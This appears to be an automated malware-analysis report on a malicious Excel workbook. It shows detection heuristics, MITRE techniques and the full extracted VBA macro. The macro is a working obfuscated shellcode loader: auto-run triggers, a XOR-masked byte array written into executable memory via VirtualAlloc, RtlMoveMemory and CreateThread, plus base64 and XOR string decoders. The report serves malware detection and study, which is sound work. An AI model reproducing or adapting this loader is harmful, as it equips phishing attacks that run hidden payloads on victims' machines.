MALICIOUS
164
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Office document containing VBA macros, specifically triggering AutoOpen and Workbook_Open heuristics, indicating malicious intent. ClamAV detections confirm its malicious nature as a downloader. The VBA script attempts to allocate memory and create a thread, strongly suggesting it downloads and executes a second-stage payload.
Heuristics 5
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Sub Sub AutoOpen() Auto_Open -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Sub Workbook_Open() Auto_Open -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
#End If Sub Auto_Open() Dim raObRmpRuGl As Long, EqkClDZDVjYzBN As Variant, ArDJBQlSlg As Long
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12840 bytes |
SHA-256: be29fa810f2906631fc07e8c7507360c37a7b96469f96d4e0fc5a4bdb38ad5fe |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
"Use this line to add the document variable to you file and then remove these comments."
ActiveDocument.Variables.Add Name:="HDRUpJOeFvEArori", Value:=""
#If VBA7 Then
Private DQcefcxPbaD As Boolean
Private KihzhPuASVYDi((0 Xor 0) To (14 + 49)) As Byte
Private FlaFCYAGRxWn(((0 Xor 0) + (0 Xor 0)) To 127) As Byte
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Ddjnhd As Long, ByVal Nvrgsxxnd As Long, ByVal Lvoyer As LongPtr, Tsa As Long, ByVal Xicali As Long, Yeooh As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Wmovb As Long, ByVal Ptk As Long, ByVal Xdcn As Long, ByVal Gbzr As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Qrlft As LongPtr, ByRef Axnli As Any, ByVal Gnppt As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Ddjnhd As Long, ByVal Nvrgsxxnd As Long, ByVal Lvoyer As Long, Tsa As Long, ByVal Xicali As Long, Yeooh As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Wmovb As Long, ByVal Ptk As Long, ByVal Xdcn As Long, ByVal Gbzr As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Qrlft As Long, ByRef Axnli As Any, ByVal Gnppt As Long) As Long
#End If
Sub Auto_Open()
Dim raObRmpRuGl As Long, EqkClDZDVjYzBN As Variant, ArDJBQlSlg As Long
#If VBA7 Then
Dim Kfz As LongPtr, Zfwefa As LongPtr
#Else
Dim Kfz As Long, Zfwefa As Long
#End If
EqkClDZDVjYzBN = Array(((8 Xor 166) + 44), (133 + (9 Xor 68)), (88 + 99), (57 Xor 217), ((56 Xor 125) + (37 Xor 13)), 101, (57 Xor 120), (201 + 16), (12 + 104), 36, (75 Xor 191), (36 Xor 122), (6 Xor 53), ((58 Xor 170) + 57), 177, (51 + (1 Xor 39)), (11 + 38), 94, (5 Xor 28), (2 Xor 1), ((25 Xor 56) + 61), (19 + (0 Xor 6)), (102 + (12 Xor 17)), (174 Xor 104), ((1 Xor 3) + 2), ((1 Xor 3) + (0 Xor 0)), (3 Xor 155), (11 Xor 146), 169, (25 + 52), 99, 98, ((4 Xor 13) + 33), 49, 237, ((15 Xor 24) + 112), (23 + 4), ((46 Xor 97) + (20 Xor 0)), (60 Xor 181), ((55 Xor 10) + 143), _
14, ((36 Xor 162) + 45), ((67 Xor 137) + 15), (76 Xor 205), (88 Xor 250), (34 Xor 26), (76 Xor 195), (15 Xor 62), 48, 76, ((11 Xor 7) + 12), ((3 Xor 7) + 7), (113 + 72), (29 Xor 162), ((7 Xor 159) + 87), (15 + 18), (19 + (1 Xor 81)), 142, (186 Xor 117), (2 + (6 Xor 30)), (31 Xor 72), (77 + (61 Xor 121)), (61 + (26 Xor 108)), ((41 Xor 30) + 41), (4 Xor 128), (70 Xor 55), ((0 Xor 0) + 141), ((2 Xor 122) + (12 Xor 62)), (190 Xor 103), (109 Xor 29), (164 + 38), (29 + (68 Xor 27)), 151, ((23 Xor 88) + 78), 134, ((125 Xor 232) + (70 Xor 38)), ((5 Xor 0) + (0 Xor 0)), _
((6 Xor 24) + 83), (88 + (7 Xor 31)), ((49 Xor 127) + (40 Xor 27)), 232, _
(42 Xor 103), ((77 Xor 26) + 40), (9 Xor 76), 103, 237, ((6 Xor 1) + (0 Xor 0)), (27 Xor 251), 184, 153, ((5 Xor 31) + (98 Xor 195)), (42 Xor 193), ((3 Xor 9) + 222), (33 + 16), (105 Xor 166), (23 Xor 179), 16, 58, 151, 20, 32, (147 + (76 Xor 16)), (79 Xor 226), (134 Xor 26), (60 Xor 106), (47 + 4), 231, ((25 Xor 61) + (9 Xor 2)), ((28 Xor 59) + 65), ((17 Xor 85) + 124), (74 + (117 Xor 12)), ((22 Xor 44) + 138), ((32 Xor 26) + (52 Xor 105)), (0 Xor 0), ((6 Xor 23) + (8 Xor 1)), ((8 Xor 28) + 7), ((2 Xor 15) + (49 Xor 120)), (8 Xor 107), (30 Xor 78), _
((17 Xor 14) + 24), ((14 Xor 44) + 54), (8 + (142 Xor 58)), (72 + (10 Xor 1)), 167, 46, (21 Xor 163), 167, (6 Xor 92), (40 Xor 1), 13, (76 Xor 153), (116 + (3 Xor 15)), (105 + (8 Xor 91)), (81 + 64), (108 Xor 17), (26 Xor 88), ((14 Xor 41) + 63), (107 + (10 Xor 0)), (55 + 72), ((116 Xor 0) + 19), (206 Xor 63), (14 + (100 Xor 148)), 115, (50 + 58), 117, (61 + 27), (144 Xor 0), (106 + 9), (81 Xor 11), (154 + (26 Xor 35)), (106 + (15 Xor 77)), (110 Xor 150), (90 + (3 Xor 0)), (46 Xor 29), ((2 Xor 0) + 35), (115 + 71), (7 Xor 126), 151, (14 + 95), (9 + 15), (2 + (204 Xor 45)), _
(21 + (53 Xor 76)), 203, (120 + (58 Xor 109)), 28, 208, (126 + 54), ((34 Xor 8) + 134), 184, (38 + (70 Xor 51)), 87, ((85 Xor 197) + (11 Xor 29)), 189, ((15 Xor 92) + 17), ((49 Xor 68) + (22 Xor 37)), 199, (114 + 113), 242, ((6 Xor 71) + 35), 10, 28, (2 Xor 0), (226 Xor 1), (19 + 10), ((62 Xor 82) + (1 Xor 2)), 48, 172, 181, (155 + (14 Xor 66)), (80 + (5 Xor 45)), (4 + (7 Xor 38)), ((4 Xor 8) + 4), ((189 Xor 106) + (6 Xor 46)), 9, (22 Xor 55), (101 Xor 198), (8 + 39), (65 Xor 240), (24 + 10), (38 + (42 Xor 29)), 208, ((42 Xor 105) + 126), ((0 Xor 1) + (54 Xor 92)), _
(134 + (2 Xor 22)), 132, 145, 3, ((2 Xor 4) + 5), (88 + 77), 122, 212, 180, (36 + 76), ((8 Xor 5) + 9), ((4 Xor 3) + 215), ((6 Xor 29) + (3 Xor 4)), ((29 Xor 92) + (96 Xor 26)), ((2 Xor 58) + 22), (118 + (9 Xor 16)), (20 + 30), (45 + 38), (53 + (12 Xor 91)), ((31 Xor 47) + (0 Xor 0)), (7 + (2 Xor 25)), 248, (21 Xor 12), (77 + 137), (5 + (9 Xor 6)), (29 + 51), (47 Xor 102), 71, 213, (0 + 0), (31 + (9 Xor 3)), ((20 Xor 15) + (11 Xor 23)), (158 Xor 35), (37 + 37), (6 + (31 Xor 191)), ((51 Xor 103) + 20), (175 Xor 114), 116, _
109, 1, (108 Xor 24), (40 + 115), ((90 Xor 249) + (23 Xor 47)), (67 + 54), ((21 Xor 35) + (83 Xor 248)), ((1 Xor 3) + (0 Xor 0)), 70, (215 Xor 38), (49 + 95), ((3 Xor 10) + (111 Xor 173)), ((44 Xor 98) + 15), ((37 Xor 29) + (38 Xor 97)), (8 Xor 154), 64, ((21 Xor 70) + 4), (122 Xor 5), ((7 Xor 58) + 32), ((41 Xor 105) + (35 Xor 66)), (16 + 2), (130 Xor 17), ((39 Xor 161) + 4), (180 + 34), (144 + (46 Xor 98)), 107, (37 + 38), ((3 Xor 67) + 51), 220, (0 Xor 1), (35 Xor 108), (151 + 62), ((6 Xor 56) + (42 Xor 103)), (188 Xor 1), (14 Xor 67), (0 + 0), _
((143 Xor 34) + (55 Xor 121)), (37 + (39 Xor 27)), ((9 Xor 0) + (160 Xor 4)), 103, 120, (7 Xor 98), (28 Xor 77), (223 Xor 41), ((14 Xor 26) + (15 Xor 59)), ((0 Xor 0) + (17 Xor 12)), (37 Xor 65), ((4 Xor 12) + (29 Xor 121)), 244, ((37 Xor 14) + (17 Xor 15)), 137, (80 + (0 Xor 16)), (24 Xor 236), (91 Xor 210), 223, 234, 244, ((13 Xor 166) + (26 Xor 44)), 135, ((2 Xor 4) + 72), (101 + (51 Xor 113)), (20 + 0), ((15 Xor 56) + 145), 90, (212 Xor 0), 132, (74 + 19), (62 Xor 91), ((10 Xor 59) + 91), (37 Xor 92), (206 Xor 59), 13, (45 Xor 31), (146 Xor 53), (33 + 16), _
146, (13 Xor 192), 130, 65, (138 Xor 95), _
((5 Xor 14) + 38), ((68 Xor 3) + (0 Xor 9)), (34 Xor 76), 126, ((30 Xor 47) + (5 Xor 45)), ((57 Xor 80) + 65), ((3 Xor 15) + (15 Xor 45)), (19 Xor 109), (34 Xor 187), 192, ((55 Xor 191) + 38), 46, 241, (29 Xor 2), ((2 Xor 20) + (10 Xor 96)), ((8 Xor 49) + 136), (33 + 16), (149 + (53 Xor 127)), ((3 Xor 10) + 2), 138, 89, 106, ((73 Xor 218) + 71), ((15 Xor 41) + (77 Xor 31)), (243 + 5), 107, (153 Xor 110), (130 Xor 95), (117 Xor 209), 108, (2 Xor 246), 197, 87, ((14 Xor 27) + (1 Xor 0)), (26 + (39 Xor 124)), (39 + (1 Xor 211)), (116 + (6 Xor 34)), 231, _
((89 Xor 45) + 43), 158, (76 + 77), 231, ((63 Xor 104) + (64 Xor 8)), 160, 166, (10 + (38 Xor 1)), 166, (29 + 185), 233, ((18 Xor 88) + (25 Xor 46)), ((90 Xor 44) + (21 Xor 50)), (87 + 146), (27 Xor 71), (78 + (19 Xor 74)), (4 + 176), ((33 Xor 2) + 64), (152 + (0 Xor 6)), 251, (67 Xor 132), 161)
Kfz = VirtualAlloc((0 + 0), UBound(EqkClDZDVjYzBN), &H1000, &H40)
For ArDJBQlSlg = LBound(EqkClDZDVjYzBN) To UBound(EqkClDZDVjYzBN)
raObRmpRuGl = EqkClDZDVjYzBN(ArDJBQlSlg)
Zfwefa = RtlMoveMemory(Kfz + ArDJBQlSlg, raObRmpRuGl, ((0 Xor 0) + 1))
Next ArDJBQlSlg
Zfwefa = CreateThread(0, ((0 Xor 0) + 0), Kfz, 0, ((0 Xor 0) + (0 Xor 0)), ((0 Xor 0) + (0 Xor 0)))
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Public Function MdRKHJSpYcfey(ByVal dKfCJalAik As String) As Byte()
If Not DQcefcxPbaD Then ycNRyZstPVXIx
Dim UzpIMmEQMxuC() As Byte: UzpIMmEQMxuC = ONyEusdaMk(dKfCJalAik)
Dim XZZTxZcocoviy As Long: XZZTxZcocoviy = UBound(UzpIMmEQMxuC) + 1
If XZZTxZcocoviy Mod 4 <> (0 Xor 0) Then Err.Raise vbObjectError, , ""
Do While XZZTxZcocoviy > (0 + (0 Xor 0))
If UzpIMmEQMxuC(XZZTxZcocoviy - ((0 Xor 1) + (0 Xor 0))) <> Asc("=") Then Exit Do
XZZTxZcocoviy = XZZTxZcocoviy - (1 Xor 0)
Loop
Dim cmjhdGdylJxZ As Long: cmjhdGdylJxZ = (XZZTxZcocoviy * ((1 Xor 3) + 1)) \ 4
Dim fsKGtGgiVerQf() As Byte
ReDim fsKGtGgiVerQf(0 To cmjhdGdylJxZ - (0 Xor 1)) As Byte
Dim UxMnhneejjlv As Long
Dim ifVrXqiKLmbJqT As Long
Do While UxMnhneejjlv < XZZTxZcocoviy
Dim QZwImjRdFya As Byte: QZwImjRdFya = UzpIMmEQMxuC(UxMnhneejjlv): UxMnhneejjlv = UxMnhneejjlv + ((0 Xor 0) + 1)
Dim eRvEOxuniVCT As Byte: eRvEOxuniVCT = UzpIMmEQMxuC(UxMnhneejjlv): UxMnhneejjlv = UxMnhneejjlv + (1 + 0)
Dim GmKjwkFPsGIrnG As Byte: If UxMnhneejjlv < XZZTxZcocoviy Then GmKjwkFPsGIrnG = UzpIMmEQMxuC(UxMnhneejjlv): UxMnhneejjlv = UxMnhneejjlv + (1 + 0) Else GmKjwkFPsGIrnG = Asc("A")
Dim BDUYNMHbxEEoR As Byte: If UxMnhneejjlv < XZZTxZcocoviy Then BDUYNMHbxEEoR = UzpIMmEQMxuC(UxMnhneejjlv): UxMnhneejjlv = UxMnhneejjlv + (1 Xor 0) Else BDUYNMHbxEEoR = Asc("A")
If QZwImjRdFya > (11 + (103 Xor 19)) Or eRvEOxuniVCT > 127 Or GmKjwkFPsGIrnG > (26 Xor 101) Or BDUYNMHbxEEoR > ((16 Xor 81) + (28 Xor 34)) Then _
Err.Raise vbObjectError, , ""
Dim XxeUCetKef As Byte: XxeUCetKef = FlaFCYAGRxWn(QZwImjRdFya)
Dim wmJvoLAqqeW As Byte: wmJvoLAqqeW = FlaFCYAGRxWn(eRvEOxuniVCT)
Dim fUeWjEpVKwn As Byte: fUeWjEpVKwn = FlaFCYAGRxWn(GmKjwkFPsGIrnG)
Dim RGzzrOZYQmcfQI As Byte: RGzzrOZYQmcfQI = FlaFCYAGRxWn(BDUYNMHbxEEoR)
If XxeUCetKef > (9 + 54) Or wmJvoLAqqeW > 63 Or fUeWjEpVKwn > ((18 Xor 7) + (25 Xor 51)) Or RGzzrOZYQmcfQI > (42 + (15 Xor 26)) Then _
Err.Raise vbObjectError, , ""
Dim fIDzqXkbtYtLx As Byte: fIDzqXkbtYtLx = (XxeUCetKef * (4 + 0)) Or (wmJvoLAqqeW \ &H10)
Dim eNFXIduFQmNKyD As Byte: eNFXIduFQmNKyD = ((wmJvoLAqqeW And &HF) * &H10) Or (fUeWjEpVKwn \ ((2 Xor 6) + 0))
Dim ohlFSpkxuu As Byte: ohlFSpkxuu = ((fUeWjEpVKwn And 3) * &H40) Or RGzzrOZYQmcfQI
fsKGtGgiVerQf(ifVrXqiKLmbJqT) = fIDzqXkbtYtLx: ifVrXqiKLmbJqT = ifVrXqiKLmbJqT + 1
If ifVrXqiKLmbJqT < cmjhdGdylJxZ Then fsKGtGgiVerQf(ifVrXqiKLmbJqT) = eNFXIduFQmNKyD: ifVrXqiKLmbJqT = ifVrXqiKLmbJqT + (1 Xor 0)
If ifVrXqiKLmbJqT < cmjhdGdylJxZ Then fsKGtGgiVerQf(ifVrXqiKLmbJqT) = ohlFSpkxuu: ifVrXqiKLmbJqT = ifVrXqiKLmbJqT + ((0 Xor 1) + 0)
Loop
MdRKHJSpYcfey = fsKGtGgiVerQf
End Function
Private Sub ycNRyZstPVXIx()
Dim rJLqInozYBrFK As Integer, TwbaJbBpihMA As Integer
TwbaJbBpihMA = (0 Xor 0)
For rJLqInozYBrFK = Asc("A") To Asc("Z"): KihzhPuASVYDi(TwbaJbBpihMA) = rJLqInozYBrFK: TwbaJbBpihMA = TwbaJbBpihMA + (0 + (1 Xor 0)): Next
For rJLqInozYBrFK = Asc("a") To Asc("z"): KihzhPuASVYDi(TwbaJbBpihMA) = rJLqInozYBrFK: TwbaJbBpihMA = TwbaJbBpihMA + 1: Next
For rJLqInozYBrFK = Asc("0") To Asc("9"): KihzhPuASVYDi(TwbaJbBpihMA) = rJLqInozYBrFK: TwbaJbBpihMA = TwbaJbBpihMA + (0 Xor 1): Next
KihzhPuASVYDi(TwbaJbBpihMA) = Asc("+"): TwbaJbBpihMA = TwbaJbBpihMA + (0 + (1 Xor 0))
KihzhPuASVYDi(TwbaJbBpihMA) = Asc("/"): TwbaJbBpihMA = TwbaJbBpihMA + 1
For TwbaJbBpihMA = (0 Xor 0) To ((4 Xor 0) + (119 Xor 12)): FlaFCYAGRxWn(TwbaJbBpihMA) = (224 Xor 31): Next
For TwbaJbBpihMA = 0 To 63: FlaFCYAGRxWn(KihzhPuASVYDi(TwbaJbBpihMA)) = TwbaJbBpihMA: Next
DQcefcxPbaD = True
End Sub
Private Function ONyEusdaMk(ByVal dKfCJalAik As String) As Byte()
Dim wmJvoLAqqeW() As Byte: wmJvoLAqqeW = dKfCJalAik
Dim BFOibYMfXEx As Long: BFOibYMfXEx = (UBound(wmJvoLAqqeW) + 1) \ ((0 Xor 0) + 2)
If BFOibYMfXEx = 0 Then ONyEusdaMk = wmJvoLAqqeW: Exit Function
Dim fUeWjEpVKwn() As Byte
ReDim fUeWjEpVKwn((0 Xor 0) To BFOibYMfXEx - ((1 Xor 0) + (0 Xor 0))) As Byte
Dim jBsXhDUPnc As Long
For jBsXhDUPnc = (0 Xor 0) To BFOibYMfXEx - (1 + 0)
Dim rJLqInozYBrFK As Long: rJLqInozYBrFK = wmJvoLAqqeW(2 * jBsXhDUPnc) + ((49 Xor 114) + (122 Xor 199)) * CLng(wmJvoLAqqeW((0 Xor 2) * jBsXhDUPnc + ((1 Xor 0) + 0)))
If rJLqInozYBrFK >= ((35 Xor 21) + 202) Then rJLqInozYBrFK = Asc("?")
fUeWjEpVKwn(jBsXhDUPnc) = rJLqInozYBrFK
Next
ONyEusdaMk = fUeWjEpVKwn
End Function
Private Function xtAWpYUZEa(DTTRNIujYuLvn As Variant, inWQmntGydvZT As Integer)
Dim FWxNHfTXHUv As String
Dim trCCJLLerjvhv() As Byte
trCCJLLerjvhv = MdRKHJSpYcfey(ActiveDocument.Variables("HDRUpJOeFvEArori"))
FWxNHfTXHUv = ""
For TwbaJbBpihMA = LBound(DTTRNIujYuLvn) To UBound(DTTRNIujYuLvn)
FWxNHfTXHUv = FWxNHfTXHUv & Chr(trCCJLLerjvhv(TwbaJbBpihMA + inWQmntGydvZT) Xor DTTRNIujYuLvn(TwbaJbBpihMA))
Next
xtAWpYUZEa = FWxNHfTXHUv
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 33280 bytes |
SHA-256: 171962e904a8d9aa1d5fc3331e944e982e663a5e37fb7d82c27bd73b584a3c1a |
|||
|
Detection
ClamAV:
Doc.Downloader.Generic-6698421-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.